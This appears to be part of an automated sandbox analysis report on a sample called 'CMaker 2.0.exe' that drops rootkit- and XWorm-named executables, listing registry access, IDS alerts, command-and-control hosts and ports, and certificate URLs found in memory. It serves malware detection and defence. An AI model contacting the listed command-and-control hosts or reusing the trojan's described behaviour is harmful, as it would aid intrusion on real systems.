                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: CMaker 2.0.exe, 00000005.00000002.2268396288.00007FFDA3A81000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: CMaker 2.0.exe, 00000005.00000002.2269100050.00007FFDA4161000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2253563049.0000022D32BE0000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,2_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6FAC01674
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE76F0 FindFirstFileExW,FindClose,5_2_00007FF6FABE76F0
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6FABE6B80
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6FAC01674
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59BF5C FindFirstFileExW,6_2_1C59BF5C

                        Networking

                        Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49997 -> 147.185.221.21:28600
                        Source: Malware configuration extractor | URLs: updates-full.gl.at.ply.gg
                        Source: Yara match | File source: 7.0.DeadROOTkit.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.1.exe.2ff5330.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                        Source: global traffic | TCP traffic: 192.168.2.6:49766 -> 147.185.221.21:28600
                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
                        Source: Joe Sandbox View | IP Address: 208.95.112.1
                        Source: Joe Sandbox View | IP Address: 188.114.97.3
                        Source: Joe Sandbox View | IP Address: 188.114.97.3
                        Source: Joe Sandbox View | ASN Name: TUT-ASUS
                        Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                        Source: unknown | DNS query: name: ip-api.com
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
                        Source: global traffic | DNS traffic detected: DNS query: dashboard.botghost.com
                        Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                        Source: global traffic | DNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
                        Source: CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.../back.jpeg
                        Source: svchost.exe, 0000001E.00000000.2410640572.0000022E69012000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb
                        Source: CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
                        Source: CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digiK
                        Source: CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.co
                        Source: CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.coK
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472203869.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323371929.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: CMaker 2.0.exe, 00000005.00000003.2226075611.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244441586.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227028910.0000022D352A1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259027961.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228541263.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228098840.0000022D35221000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227028910.0000022D352A1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl4-
                        Source: CMaker 2.0.exe, 00000005.00000002.2259602397.0000022D35306000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.d-
                        Source: CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/SGCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226605077.0000022D352B9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D35114000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlH
